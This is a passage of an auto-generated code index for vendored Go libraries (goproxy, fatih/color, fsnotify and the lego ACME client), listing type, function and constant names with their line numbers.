ctx *ProxyCtx) *h... type HttpsHandler (line 47) | type HttpsHandler interface type FuncHttpsHandler (line 52) | type FuncHttpsHandler method HandleConnect (line 55) | func (f FuncHttpsHandler) HandleConnect(host string, ctx *ProxyCtx) (*... FILE: vendor/github.com/elazarl/goproxy/certs.go function init (line 8) | func init() { FILE: vendor/github.com/elazarl/goproxy/chunked.go function newChunkedWriter (line 19) | func newChunkedWriter(w io.Writer) io.WriteCloser { type chunkedWriter (line 25) | type chunkedWriter struct method Write (line 32) | func (cw *chunkedWriter) Write(data []byte) (n int, err error) { method Close (line 56) | func (cw *chunkedWriter) Close() error { FILE: vendor/github.com/elazarl/goproxy/counterecryptor.go type CounterEncryptorRand (line 13) | type CounterEncryptorRand struct method Seed (line 46) | func (c *CounterEncryptorRand) Seed(b []byte) { method refill (line 53) | func (c *CounterEncryptorRand) refill() { method Read (line 63) | func (c *CounterEncryptorRand) Read(b []byte) (n int, err error) { function NewCounterEncryptorRandFromKey (line 20) | func NewCounterEncryptorRandFromKey(key interface{}, seed []byte) (r Cou... FILE: vendor/github.com/elazarl/goproxy/ctx.go type ProxyCtx (line 11) | type ProxyCtx struct method RoundTrip (line 42) | func (ctx *ProxyCtx) RoundTrip(req *http.Request) (*http.Response, err... method printf (line 49) | func (ctx *ProxyCtx) printf(msg string, argv ...interface{}) { method Logf (line 61) | func (ctx *ProxyCtx) Logf(msg string, argv ...interface{}) { method Warnf (line 78) | func (ctx *ProxyCtx) Warnf(msg string, argv ...interface{}) { method Charset (line 87) | func (ctx *ProxyCtx) Charset() string { type RoundTripper (line 28) | type RoundTripper interface type CertStorage (line 32) | type CertStorage interface type RoundTripperFunc (line 36) | type RoundTripperFunc method RoundTrip (line 38) | func (f RoundTripperFunc) RoundTrip(req *http.Request, ctx *ProxyCtx) ... FILE: vendor/github.com/elazarl/goproxy/dispatcher.go type ReqCondition (line 14) | type ReqCondition interface type RespCondition (line 22) | type RespCondition interface type ReqConditionFunc (line 27) | type ReqConditionFunc method HandleReq (line 32) | func (c ReqConditionFunc) HandleReq(req *http.Request, ctx *ProxyCtx) ... method HandleResp (line 38) | func (c ReqConditionFunc) HandleResp(resp *http.Response, ctx *ProxyCt... type RespConditionFunc (line 30) | type RespConditionFunc method HandleResp (line 42) | func (c RespConditionFunc) HandleResp(resp *http.Response, ctx *ProxyC... function UrlHasPrefix (line 50) | func UrlHasPrefix(prefix string) ReqConditionFunc { function UrlIs (line 62) | func UrlIs(urls ...string) ReqConditionFunc { function ReqHostMatches (line 76) | func ReqHostMatches(regexps ...*regexp.Regexp) ReqConditionFunc { function ReqHostIs (line 89) | func ReqHostIs(hosts ...string) ReqConditionFunc { function UrlMatches (line 113) | func UrlMatches(re *regexp.Regexp) ReqConditionFunc { function DstHostIs (line 121) | func DstHostIs(host string) ReqConditionFunc { function SrcIpIs (line 128) | func SrcIpIs(ips ...string) ReqCondition { function Not (line 140) | func Not(r ReqCondition) ReqConditionFunc { function ContentTypeIs (line 148) | func ContentTypeIs(typ string, types ...string) RespCondition { function StatusCodeIs (line 166) | func StatusCodeIs(codes ...int) RespCondition { method OnRequest (line 185) | func (proxy *ProxyHttpServer) OnRequest(conds ...ReqCondition) *ReqProxy... type ReqProxyConds (line 191) | type ReqProxyConds struct method DoFunc (line 197) | func (pcond *ReqProxyConds) DoFunc(f func(req *http.Request, ctx *Prox... method Do (line 208) | func (pcond *ReqProxyConds) Do(h ReqHandler) { method HandleConnect (line 231) | func (pcond *ReqProxyConds) HandleConnect(h HttpsHandler) { method HandleConnectFunc (line 255) | func (pcond *ReqProxyConds) HandleConnectFunc(f func(host string, ctx ... method HijackConnect (line 259) | func (pcond *ReqProxyConds) HijackConnect(f func(req *http.Request, cl... type ProxyConds (line 274) | type ProxyConds struct method DoFunc (line 281) | func (pcond *ProxyConds) DoFunc(f func(resp *http.Response, ctx *Proxy... method Do (line 287) | func (pcond *ProxyConds) Do(h RespHandler) { method OnResponse (line 307) | func (proxy *ProxyHttpServer) OnResponse(conds ...RespCondition) *ProxyC... function HandleBytes (line 329) | func HandleBytes(f func(b []byte, ctx *ProxyCtx) []byte) RespHandler { FILE: vendor/github.com/elazarl/goproxy/https.go type ConnectActionLiteral (line 20) | type ConnectActionLiteral constant ConnectAccept (line 23) | ConnectAccept = iota constant ConnectReject (line 24) | ConnectReject constant ConnectMitm (line 25) | ConnectMitm constant ConnectHijack (line 26) | ConnectHijack constant ConnectHTTPMitm (line 27) | ConnectHTTPMitm constant ConnectProxyAuthHijack (line 28) | ConnectProxyAuthHijack type ConnectAction (line 43) | type ConnectAction struct function stripPort (line 49) | func stripPort(s string) string { method dial (line 73) | func (proxy *ProxyHttpServer) dial(network, addr string) (c net.Conn, er... method connectDial (line 80) | func (proxy *ProxyHttpServer) connectDial(network, addr string) (c net.C... type halfClosable (line 87) | type halfClosable interface method handleHttps (line 95) | func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http... function httpError (line 321) | func httpError(w io.WriteCloser, ctx *ProxyCtx, err error) { function copyOrWarn (line 330) | func copyOrWarn(ctx *ProxyCtx, dst io.Writer, src io.Reader, wg *sync.Wa... function copyAndClose (line 337) | func copyAndClose(ctx *ProxyCtx, dst, src halfClosable) { function dialerFromEnv (line 346) | func dialerFromEnv(proxy *ProxyHttpServer) func(network, addr string) (n... method NewConnectDialToProxy (line 357) | func (proxy *ProxyHttpServer) NewConnectDialToProxy(https_proxy string) ... method NewConnectDialToProxyWithHandler (line 361) | func (proxy *ProxyHttpServer) NewConnectDialToProxyWithHandler(https_pro... function TLSConfigFromCA (line 450) | func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *ProxyCt... FILE: vendor/github.com/elazarl/goproxy/logger.go type Logger (line 3) | type Logger interface FILE: vendor/github.com/elazarl/goproxy/proxy.go type ProxyHttpServer (line 15) | type ProxyHttpServer struct method filterRequest (line 59) | func (proxy *ProxyHttpServer) filterRequest(r *http.Request, ctx *Prox... method filterResponse (line 71) | func (proxy *ProxyHttpServer) filterResponse(respOrig *http.Response, ... method ServeHTTP (line 125) | func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http... function copyHeaders (line 38) | func copyHeaders(dst, src http.Header, keepDestHeaders bool) { function isEof (line 51) | func isEof(r *bufio.Reader) bool { function removeProxyHeaders (line 80) | func removeProxyHeaders(ctx *ProxyCtx, r *http.Request) { type flushWriter (line 110) | type flushWriter struct method Write (line 114) | func (fw flushWriter) Write(p []byte) (int, error) { function NewProxyHttpServer (line 209) | func NewProxyHttpServer() *ProxyHttpServer { FILE: vendor/github.com/elazarl/goproxy/responses.go function NewResponse (line 17) | func NewResponse(r *http.Request, contentType string, status int, body s... constant ContentTypeText (line 32) | ContentTypeText = "text/plain" constant ContentTypeHtml (line 33) | ContentTypeHtml = "text/html" function TextResponse (line 37) | func TextResponse(r *http.Request, text string) *http.Response { FILE: vendor/github.com/elazarl/goproxy/signer.go function hashSorted (line 21) | func hashSorted(lst []string) []byte { function hashSortedBigInt (line 32) | func hashSortedBigInt(lst []string) *big.Int { function signHost (line 40) | func signHost(ca tls.Certificate, hosts []string) (cert *tls.Certificate... function init (line 107) | func init() { FILE: vendor/github.com/elazarl/goproxy/websocket.go function headerContains (line 13) | func headerContains(header http.Header, name string, value string) bool { function isWebSocketRequest (line 24) | func isWebSocketRequest(r *http.Request) bool { method serveWebsocketTLS (line 29) | func (proxy *ProxyHttpServer) serveWebsocketTLS(ctx *ProxyCtx, w http.Re... method serveWebsocket (line 54) | func (proxy *ProxyHttpServer) serveWebsocket(ctx *ProxyCtx, w http.Respo... method websocketHandshake (line 89) | func (proxy *ProxyHttpServer) websocketHandshake(ctx *ProxyCtx, req *htt... method proxyWebsocket (line 118) | func (proxy *ProxyHttpServer) proxyWebsocket(ctx *ProxyCtx, dest io.Read... FILE: vendor/github.com/fatih/color/color.go function noColorExists (line 39) | func noColorExists() bool { type Color (line 45) | type Color struct method Set (line 150) | func (c *Color) Set() *Color { method unset (line 159) | func (c *Color) unset() { method setWriter (line 167) | func (c *Color) setWriter(w io.Writer) *Color { method unsetWriter (line 176) | func (c *Color) unsetWriter(w io.Writer) { method Add (line 190) | func (c *Color) Add(value ...Attribute) *Color { method prepend (line 195) | func (c *Color) prepend(value Attribute) { method Fprint (line 206) | func (c *Color) Fprint(w io.Writer, a ...interface{}) (n int, err erro... method Print (line 218) | func (c *Color) Print(a ...interface{}) (n int, err error) { method Fprintf (line 229) | func (c *Color) Fprintf(w io.Writer, format string, a ...interface{}) ... method Printf (line 239) | func (c *Color) Printf(format string, a ...interface{}) (n int, err er... method Fprintln (line 250) | func (c *Color) Fprintln(w io.Writer, a ...interface{}) (n int, err er... method Println (line 262) | func (c *Color) Println(a ...interface{}) (n int, err error) { method Sprint (line 270) | func (c *Color) Sprint(a ...interface{}) string { method Sprintln (line 275) | func (c *Color) Sprintln(a ...interface{}) string { method Sprintf (line 280) | func (c *Color) Sprintf(format string, a ...interface{}) string { method FprintFunc (line 286) | func (c *Color) FprintFunc() func(w io.Writer, a ...interface{}) { method PrintFunc (line 294) | func (c *Color) PrintFunc() func(a ...interface{}) { method FprintfFunc (line 302) | func (c *Color) FprintfFunc() func(w io.Writer, format string, a ...in... method PrintfFunc (line 310) | func (c *Color) PrintfFunc() func(format string, a ...interface{}) { method FprintlnFunc (line 318) | func (c *Color) FprintlnFunc() func(w io.Writer, a ...interface{}) { method PrintlnFunc (line 326) | func (c *Color) PrintlnFunc() func(a ...interface{}) { method SprintFunc (line 338) | func (c *Color) SprintFunc() func(a ...interface{}) string { method SprintfFunc (line 347) | func (c *Color) SprintfFunc() func(format string, a ...interface{}) st... method SprintlnFunc (line 356) | func (c *Color) SprintlnFunc() func(a ...interface{}) string { method sequence (line 364) | func (c *Color) sequence() string { method wrap (line 375) | func (c *Color) wrap(s string) string { method format (line 383) | func (c *Color) format() string { method unformat (line 387) | func (c *Color) unformat() string { method DisableColor (line 394) | func (c *Color) DisableColor() { method EnableColor (line 400) | func (c *Color) EnableColor() { method isNoColorSet (line 404) | func (c *Color) isNoColorSet() bool { method Equals (line 415) | func (c *Color) Equals(c2 *Color) bool { method attrExists (line 429) | func (c *Color) attrExists(a Attribute) bool { type Attribute (line 51) | type Attribute constant escape (line 53) | escape = "\x1b" constant Reset (line 57) | Reset Attribute = iota constant Bold (line 58) | Bold constant Faint (line 59) | Faint constant Italic (line 60) | Italic constant Underline (line 61) | Underline constant BlinkSlow (line 62) | BlinkSlow constant BlinkRapid (line 63) | BlinkRapid constant ReverseVideo (line 64) | ReverseVideo constant Concealed (line 65) | Concealed constant CrossedOut (line 66) | CrossedOut constant FgBlack (line 71) | FgBlack Attribute = iota + 30 constant FgRed (line 72) | FgRed constant FgGreen (line 73) | FgGreen constant FgYellow (line 74) | FgYellow constant FgBlue (line 75) | FgBlue constant FgMagenta (line 76) | FgMagenta constant FgCyan (line 77) | FgCyan constant FgWhite (line 78) | FgWhite constant FgHiBlack (line 83) | FgHiBlack Attribute = iota + 90 constant FgHiRed (line 84) | FgHiRed constant FgHiGreen (line 85) | FgHiGreen constant FgHiYellow (line 86) | FgHiYellow constant FgHiBlue (line 87) | FgHiBlue constant FgHiMagenta (line 88) | FgHiMagenta constant FgHiCyan (line 89) | FgHiCyan constant FgHiWhite (line 90) | FgHiWhite constant BgBlack (line 95) | BgBlack Attribute = iota + 40 constant BgRed (line 96) | BgRed constant BgGreen (line 97) | BgGreen constant BgYellow (line 98) | BgYellow constant BgBlue (line 99) | BgBlue constant BgMagenta (line 100) | BgMagenta constant BgCyan (line 101) | BgCyan constant BgWhite (line 102) | BgWhite constant BgHiBlack (line 107) | BgHiBlack Attribute = iota + 100 constant BgHiRed (line 108) | BgHiRed constant BgHiGreen (line 109) | BgHiGreen constant BgHiYellow (line 110) | BgHiYellow constant BgHiBlue (line 111) | BgHiBlue constant BgHiMagenta (line 112) | BgHiMagenta constant BgHiCyan (line 113) | BgHiCyan constant BgHiWhite (line 114) | BgHiWhite function New (line 118) | func New(value ...Attribute) *Color { function Set (line 133) | func Set(p ...Attribute) *Color { function Unset (line 141) | func Unset() { function boolPtr (line 439) | func boolPtr(v bool) *bool { function getCachedColor (line 443) | func getCachedColor(p Attribute) *Color { function colorPrint (line 456) | func colorPrint(format string, p Attribute, a ...interface{}) { function colorString (line 470) | func colorString(format string, p Attribute, a ...interface{}) string { function Black (line 482) | func Black(format string, a ...interface{}) { colorPrint(format, FgBlack... function Red (line 486) | func Red(format string, a ...interface{}) { colorPrint(format, FgRed, a.... function Green (line 490) | func Green(format string, a ...interface{}) { colorPrint(format, FgGreen... function Yellow (line 494) | func Yellow(format string, a ...interface{}) { colorPrint(format, FgYell... function Blue (line 498) | func Blue(format string, a ...interface{}) { colorPrint(format, FgBlue, ... function Magenta (line 502) | func Magenta(format string, a ...interface{}) { colorPrint(format, FgMag... function Cyan (line 506) | func Cyan(format string, a ...interface{}) { colorPrint(format, FgCyan, ... function White (line 510) | func White(format string, a ...interface{}) { colorPrint(format, FgWhite... function BlackString (line 514) | func BlackString(format string, a ...interface{}) string { return colorS... function RedString (line 518) | func RedString(format string, a ...interface{}) string { return colorStr... function GreenString (line 522) | func GreenString(format string, a ...interface{}) string { return colorS... function YellowString (line 526) | func YellowString(format string, a ...interface{}) string { return color... function BlueString (line 530) | func BlueString(format string, a ...interface{}) string { return colorSt... function MagentaString (line 534) | func MagentaString(format string, a ...interface{}) string { function CyanString (line 540) | func CyanString(format string, a ...interface{}) string { return colorSt... function WhiteString (line 544) | func WhiteString(format string, a ...interface{}) string { return colorS... function HiBlack (line 548) | func HiBlack(format string, a ...interface{}) { colorPrint(format, FgHiB... function HiRed (line 552) | func HiRed(format string, a ...interface{}) { colorPrint(format, FgHiRed... function HiGreen (line 556) | func HiGreen(format string, a ...interface{}) { colorPrint(format, FgHiG... function HiYellow (line 560) | func HiYellow(format string, a ...interface{}) { colorPrint(format, FgHi... function HiBlue (line 564) | func HiBlue(format string, a ...interface{}) { colorPrint(format, FgHiBl... function HiMagenta (line 568) | func HiMagenta(format string, a ...interface{}) { colorPrint(format, FgH... function HiCyan (line 572) | func HiCyan(format string, a ...interface{}) { colorPrint(format, FgHiCy... function HiWhite (line 576) | func HiWhite(format string, a ...interface{}) { colorPrint(format, FgHiW... function HiBlackString (line 580) | func HiBlackString(format string, a ...interface{}) string { function HiRedString (line 586) | func HiRedString(format string, a ...interface{}) string { return colorS... function HiGreenString (line 590) | func HiGreenString(format string, a ...interface{}) string { function HiYellowString (line 596) | func HiYellowString(format string, a ...interface{}) string { function HiBlueString (line 602) | func HiBlueString(format string, a ...interface{}) string { return color... function HiMagentaString (line 606) | func HiMagentaString(format string, a ...interface{}) string { function HiCyanString (line 612) | func HiCyanString(format string, a ...interface{}) string { return color... function HiWhiteString (line 616) | func HiWhiteString(format string, a ...interface{}) string { FILE: vendor/github.com/fsnotify/fsnotify/fen.go type Watcher (line 15) | type Watcher struct method Close (line 26) | func (w *Watcher) Close() error { method Add (line 31) | func (w *Watcher) Add(name string) error { method Remove (line 36) | func (w *Watcher) Remove(name string) error { function NewWatcher (line 21) | func NewWatcher() (*Watcher, error) { FILE: vendor/github.com/fsnotify/fsnotify/fsnotify.go type Event (line 18) | type Event struct method String (line 62) | func (e Event) String() string { type Op (line 24) | type Op method String (line 35) | func (op Op) String() string { constant Create (line 28) | Create Op = 1 << iota constant Write (line 29) | Write constant Remove (line 30) | Remove constant Rename (line 31) | Rename constant Chmod (line 32) | Chmod FILE: vendor/github.com/fsnotify/fsnotify/inotify.go type Watcher (line 24) | type Watcher struct method isClosed (line 64) | func (w *Watcher) isClosed() bool { method Close (line 74) | func (w *Watcher) Close() error { method Add (line 92) | func (w *Watcher) Add(name string) error { method Remove (line 127) | func (w *Watcher) Remove(name string) error { method readEvents (line 173) | func (w *Watcher) readEvents() { function NewWatcher (line 37) | func NewWatcher() (*Watcher, error) { type watch (line 166) | type watch struct method ignoreLinux (line 301) | func (e *Event) ignoreLinux(mask uint32) bool { function newEvent (line 320) | func newEvent(name string, mask uint32) Event { FILE: vendor/github.com/fsnotify/fsnotify/inotify_poller.go type fdPoller (line 16) | type fdPoller struct method wait (line 80) | func (poller *fdPoller) wait() (bool, error) { method wake (line 150) | func (poller *fdPoller) wake() error { method clearWake (line 163) | func (poller *fdPoller) clearWake() error { method close (line 178) | func (poller *fdPoller) close() { function emptyPoller (line 22) | func emptyPoller(fd int) *fdPoller { function newFdPoller (line 33) | func newFdPoller(fd int) (*fdPoller, error) { FILE: vendor/github.com/fsnotify/fsnotify/kqueue.go type Watcher (line 23) | type Watcher struct method Close (line 68) | func (w *Watcher) Close() error { method Add (line 95) | func (w *Watcher) Add(name string) error { method Remove (line 104) | func (w *Watcher) Remove(name string) error { method addWatch (line 160) | func (w *Watcher) addWatch(name string, flags uint32) (string, error) { method readEvents (line 262) | func (w *Watcher) readEvents() { method watchDirectoryFiles (line 391) | func (w *Watcher) watchDirectoryFiles(dirPath string) error { method sendDirectoryChangeEvents (line 417) | func (w *Watcher) sendDirectoryChangeEvents(dirPath string) { method sendFileCreatedEventIfNew (line 440) | func (w *Watcher) sendFileCreatedEventIfNew(filePath string, fileInfo ... method internalWatch (line 466) | func (w *Watcher) internalWatch(name string, fileInfo os.FileInfo) (st... type pathInfo (line 39) | type pathInfo struct function NewWatcher (line 45) | func NewWatcher() (*Watcher, error) { constant noteAllEvents (line 152) | noteAllEvents = unix.NOTE_DELETE | unix.NOTE_WRITE | unix.NOTE_ATTRIB | ... function newEvent (line 369) | func newEvent(name string, mask uint32) Event { function newCreateEvent (line 386) | func newCreateEvent(name string) Event { function kqueue (line 483) | func kqueue() (kq int, err error) { function register (line 492) | func register(kq int, fds []int, flags int, fflags uint32) error { function read (line 511) | func read(kq int, events []unix.Kevent_t, timeout *unix.Timespec) ([]uni... function durationToTimespec (line 520) | func durationToTimespec(d time.Duration) unix.Timespec { FILE: vendor/github.com/fsnotify/fsnotify/open_mode_bsd.go constant openMode (line 12) | openMode = unix.O_NONBLOCK | unix.O_RDONLY | unix.O_CLOEXEC FILE: vendor/github.com/fsnotify/fsnotify/open_mode_darwin.go constant openMode (line 13) | openMode = unix.O_EVTONLY | unix.O_CLOEXEC FILE: vendor/github.com/fsnotify/fsnotify/windows.go type Watcher (line 22) | type Watcher struct method Close (line 52) | func (w *Watcher) Close() error { method Add (line 68) | func (w *Watcher) Add(name string) error { method Remove (line 86) | func (w *Watcher) Remove(name string) error { method wakeupReader (line 178) | func (w *Watcher) wakeupReader() error { method addWatch (line 241) | func (w *Watcher) addWatch(pathname string, flags uint64) error { method remWatch (line 290) | func (w *Watcher) remWatch(pathname string) error { method deleteWatch (line 317) | func (w *Watcher) deleteWatch(watch *watch) { method startRead (line 333) | func (w *Watcher) startRead(watch *watch) error { method readEvents (line 374) | func (w *Watcher) readEvents() { method sendEvent (line 518) | func (w *Watcher) sendEvent(name string, mask uint64) bool { function NewWatcher (line 34) | func NewWatcher() (*Watcher, error) { constant sysFSONESHOT (line 101) | sysFSONESHOT = 0x80000000 constant sysFSONLYDIR (line 102) | sysFSONLYDIR = 0x1000000 constant sysFSACCESS (line 105) | sysFSACCESS = 0x1 constant sysFSALLEVENTS (line 106) | sysFSALLEVENTS = 0xfff constant sysFSATTRIB (line 107) | sysFSATTRIB = 0x4 constant sysFSCLOSE (line 108) | sysFSCLOSE = 0x18 constant sysFSCREATE (line 109) | sysFSCREATE = 0x100 constant sysFSDELETE (line 110) | sysFSDELETE = 0x200 constant sysFSDELETESELF (line 111) | sysFSDELETESELF = 0x400 constant sysFSMODIFY (line 112) | sysFSMODIFY = 0x2 constant sysFSMOVE (line 113) | sysFSMOVE = 0xc0 constant sysFSMOVEDFROM (line 114) | sysFSMOVEDFROM = 0x40 constant sysFSMOVEDTO (line 115) | sysFSMOVEDTO = 0x80 constant sysFSMOVESELF (line 116) | sysFSMOVESELF = 0x800 constant sysFSIGNORED (line 119) | sysFSIGNORED = 0x8000 constant sysFSQOVERFLOW (line 120) | sysFSQOVERFLOW = 0x4000 function newEvent (line 123) | func newEvent(name string, mask uint32) Event { constant opAddWatch (line 144) | opAddWatch = iota constant opRemoveWatch (line 145) | opRemoveWatch constant provisional (line 149) | provisional uint64 = 1 << (32 + iota) type input (line 152) | type input struct type inode (line 159) | type inode struct type watch (line 165) | type watch struct type indexMap (line 175) | type indexMap type watchMap (line 176) | type watchMap method get (line 223) | func (m watchMap) get(ino *inode) *watch { method set (line 231) | func (m watchMap) set(ino *inode, watch *watch) { function getDir (line 186) | func getDir(pathname string) (dir string, err error) { function getIno (line 200) | func getIno(path string) (ino *inode, err error) { function toWindowsFlags (line 531) | func toWindowsFlags(mask uint64) uint32 { function toFSnotifyFlags (line 548) | func toFSnotifyFlags(action uint32) uint64 { FILE: vendor/github.com/go-acme/lego/v3/acme/api/account.go type AccountService (line 11) | type AccountService method New (line 14) | func (a *AccountService) New(req acme.Account) (acme.ExtendedAccount, ... method NewEAB (line 31) | func (a *AccountService) NewEAB(accMsg acme.Account, kid string, hmacE... method Get (line 47) | func (a *AccountService) Get(accountURL string) (acme.Account, error) { method Deactivate (line 61) | func (a *AccountService) Deactivate(accountURL string) error { FILE: vendor/github.com/go-acme/lego/v3/acme/api/api.go type Core (line 22) | type Core struct method post (line 64) | func (a *Core) post(uri string, reqBody, response interface{}) (*http.... method postAsGet (line 75) | func (a *Core) postAsGet(uri string, response interface{}) (*http.Resp... method retrievablePost (line 79) | func (a *Core) retrievablePost(uri string, content []byte, response in... method signedPost (line 115) | func (a *Core) signedPost(uri string, content []byte, response interfa... method signEABContent (line 134) | func (a *Core) signEABContent(newAccountURL, kid string, hmac []byte) ... method GetKeyAuthorization (line 144) | func (a *Core) GetKeyAuthorization(token string) (string, error) { method GetDirectory (line 148) | func (a *Core) GetDirectory() acme.Directory { function New (line 38) | func New(httpClient *http.Client, userAgent string, caDirURL, kid string... function getDirectory (line 152) | func getDirectory(do *sender.Doer, caDirURL string) (acme.Directory, err... FILE: vendor/github.com/go-acme/lego/v3/acme/api/authorization.go type AuthorizationService (line 9) | type AuthorizationService method Get (line 12) | func (c *AuthorizationService) Get(authzURL string) (acme.Authorizatio... method Deactivate (line 26) | func (c *AuthorizationService) Deactivate(authzURL string) error { FILE: vendor/github.com/go-acme/lego/v3/acme/api/certificate.go constant maxBodySize (line 16) | maxBodySize = 1024 * 1024 type CertificateService (line 18) | type CertificateService method Get (line 22) | func (c *CertificateService) Get(certURL string, bundle bool) ([]byte,... method Revoke (line 51) | func (c *CertificateService) Revoke(req acme.RevokeCertMessage) error { method get (line 57) | func (c *CertificateService) get(certURL string) ([]byte, string, erro... method getIssuerFromLink (line 81) | func (c *CertificateService) getIssuerFromLink(up string) ([]byte, err... FILE: vendor/github.com/go-acme/lego/v3/acme/api/challenge.go type ChallengeService (line 9) | type ChallengeService method New (line 12) | func (c *ChallengeService) New(chlgURL string) (acme.ExtendedChallenge... method Get (line 31) | func (c *ChallengeService) Get(chlgURL string) (acme.ExtendedChallenge... FILE: vendor/github.com/go-acme/lego/v3/acme/api/internal/nonces/nonce_manager.go type Manager (line 13) | type Manager struct method Pop (line 29) | func (n *Manager) Pop() (string, bool) { method Push (line 43) | func (n *Manager) Push(nonce string) { method Nonce (line 50) | func (n *Manager) Nonce() (string, error) { method getNonce (line 57) | func (n *Manager) getNonce() (string, error) { function NewManager (line 21) | func NewManager(do *sender.Doer, nonceURL string) *Manager { function GetFromResponse (line 67) | func GetFromResponse(resp *http.Response) (string, error) { FILE: vendor/github.com/go-acme/lego/v3/acme/api/internal/secure/jws.go type JWS (line 16) | type JWS struct method SetKid (line 32) | func (j *JWS) SetKid(kid string) { method SignContent (line 37) | func (j *JWS) SignContent(url string, content []byte) (*jose.JSONWebSi... method SignEABContent (line 79) | func (j *JWS) SignEABContent(url, kid string, hmac []byte) (*jose.JSON... method GetKeyAuthorization (line 109) | func (j *JWS) GetKeyAuthorization(token string) (string, error) { function NewJWS (line 23) | func NewJWS(privateKey crypto.PrivateKey, kid string, nonceManager *nonc... FILE: vendor/github.com/go-acme/lego/v3/acme/api/internal/sender/sender.go type RequestOption (line 15) | type RequestOption function contentType (line 17) | func contentType(ct string) RequestOption { type Doer (line 24) | type Doer struct method Get (line 39) | func (d *Doer) Get(url string, response interface{}) (*http.Response, ... method Head (line 50) | func (d *Doer) Head(url string) (*http.Response, error) { method Post (line 61) | func (d *Doer) Post(url string, body io.Reader, bodyType string, respo... method newRequest (line 70) | func (d *Doer) newRequest(method, uri string, body io.Reader, opts ...... method do (line 88) | func (d *Doer) do(req *http.Request, response interface{}) (*http.Resp... method formatUserAgent (line 116) | func (d *Doer) formatUserAgent() string { function NewDoer (line 30) | func NewDoer(client *http.Client, userAgent string) *Doer { function checkError (line 121) | func checkError(req *http.Request, resp *http.Response) error { FILE: vendor/github.com/go-acme/lego/v3/acme/api/internal/sender/useragent.go constant ourUserAgent (line 8) | ourUserAgent = "xenolf-acme/3.1.0" constant ourUserAgentComment (line 13) | ourUserAgentComment = "release" FILE: vendor/github.com/go-acme/lego/v3/acme/api/order.go type OrderService (line 10) | type OrderService method New (line 13) | func (o *OrderService) New(domains []string) (acme.ExtendedOrder, erro... method Get (line 34) | func (o *OrderService) Get(orderURL string) (acme.Order, error) { method UpdateForCSR (line 49) | func (o *OrderService) UpdateForCSR(orderURL string, csr []byte) (acme... FILE: vendor/github.com/go-acme/lego/v3/acme/api/service.go type service (line 8) | type service struct function getLink (line 13) | func getLink(header http.Header, rel string) string { function getLocation (line 30) | func getLocation(resp *http.Response) string { function getRetryAfter (line 39) | func getRetryAfter(resp *http.Response) string { FILE: vendor/github.com/go-acme/lego/v3/acme/commons.go constant StatusPending (line 13) | StatusPending = "pending" constant StatusInvalid (line 14) | StatusInvalid = "invalid" constant StatusValid (line 15) | StatusValid = "valid" constant StatusProcessing (line 16) | StatusProcessing = "processing" constant StatusDeactivated (line 17) | StatusDeactivated = "deactivated" constant StatusExpired (line 18) | StatusExpired = "expired" constant StatusRevoked (line 19) | StatusRevoked = "revoked" type Directory (line 24) | type Directory struct type Meta (line 36) | type Meta struct type ExtendedAccount (line 61) | type ExtendedAccount struct type Account (line 70) | type Account struct type ExtendedOrder (line 107) | type ExtendedOrder struct type Order (line 115) | type Order struct type Authorization (line 168) | type Authorization struct type ExtendedChallenge (line 200) | type ExtendedChallenge struct type Challenge (line 211) | type Challenge struct type Identifier (line 253) | type Identifier struct type CSRMessage (line 260) | type CSRMessage struct type RevokeCertMessage (line 271) | type RevokeCertMessage struct FILE: vendor/github.com/go-acme/lego/v3/acme/errors.go constant errNS (line 9) | errNS = "urn:ietf:params:acme:error:" constant BadNonceErr (line 10) | BadNonceErr = errNS + "badNonce" type ProblemDetails (line 16) | type ProblemDetails struct method Error (line 36) | func (p ProblemDetails) Error() string { type SubProblem (line 30) | type SubProblem struct type NonceError (line 56) | type NonceError struct FILE: vendor/github.com/go-acme/lego/v3/certcrypto/crypto.go constant EC256 (line 23) | EC256 = KeyType("P256") constant EC384 (line 24) | EC384 = KeyType("P384") constant RSA2048 (line 25) | RSA2048 = KeyType("2048") constant RSA4096 (line 26) | RSA4096 = KeyType("4096") constant RSA8192 (line 27) | RSA8192 = KeyType("8192") constant OCSPGood (line 32) | OCSPGood = ocsp.Good constant OCSPRevoked (line 34) | OCSPRevoked = ocsp.Revoked constant OCSPUnknown (line 36) | OCSPUnknown = ocsp.Unknown constant OCSPServerFailed (line 38) | OCSPServerFailed = ocsp.ServerFailed type KeyType (line 48) | type KeyType type DERCertificateBytes (line 50) | type DERCertificateBytes function ParsePEMBundle (line 54) | func ParsePEMBundle(bundle []byte) ([]*x509.Certificate, error) { function ParsePEMPrivateKey (line 80) | func ParsePEMPrivateKey(key []byte) (crypto.PrivateKey, error) { function GeneratePrivateKey (line 93) | func GeneratePrivateKey(keyType KeyType) (crypto.PrivateKey, error) { function GenerateCSR (line 110) | func GenerateCSR(privateKey crypto.PrivateKey, domain string, san []stri... function PEMEncode (line 126) | func PEMEncode(data interface{}) []byte { function PEMBlock (line 130) | func PEMBlock(data interface{}) *pem.Block { function pemDecode (line 147) | func pemDecode(data []byte) (*pem.Block, error) { function PemDecodeTox509CSR (line 156) | func PemDecodeTox509CSR(pem []byte) (*x509.CertificateRequest, error) { function ParsePEMCertificate (line 171) | func ParsePEMCertificate(cert []byte) (*x509.Certificate, error) { function ExtractDomains (line 181) | func ExtractDomains(cert *x509.Certificate) []string { function ExtractDomainsCSR (line 195) | func ExtractDomainsCSR(csr *x509.CertificateRequest) []string { function containsSAN (line 212) | func containsSAN(domains []string, sanName string) bool { function GeneratePemCert (line 221) | func GeneratePemCert(privateKey *rsa.PrivateKey, domain string, extensio... function generateDerCert (line 230) | func generateDerCert(privateKey *rsa.PrivateKey, expiration time.Time, d... FILE: vendor/github.com/go-acme/lego/v3/challenge/challenges.go type Type (line 10) | type Type method String (line 25) | func (t Type) String() string { constant HTTP01 (line 15) | HTTP01 = Type("http-01") constant DNS01 (line 19) | DNS01 = Type("dns-01") constant TLSALPN01 (line 22) | TLSALPN01 = Type("tls-alpn-01") function FindChallenge (line 29) | func FindChallenge(chlgType Type, authz acme.Authorization) (acme.Challe... function GetTargetedDomain (line 39) | func GetTargetedDomain(authz acme.Authorization) string { FILE: vendor/github.com/go-acme/lego/v3/challenge/provider.go type Provider (line 9) | type Provider interface type ProviderTimeout (line 25) | type ProviderTimeout interface FILE: vendor/github.com/go-acme/lego/v3/challenge/tlsalpn01/tls_alpn_challenge.go type ValidateFunc (line 22) | type ValidateFunc type Challenge (line 24) | type Challenge struct method SetProvider (line 38) | func (c *Challenge) SetProvider(provider challenge.Provider) { method Solve 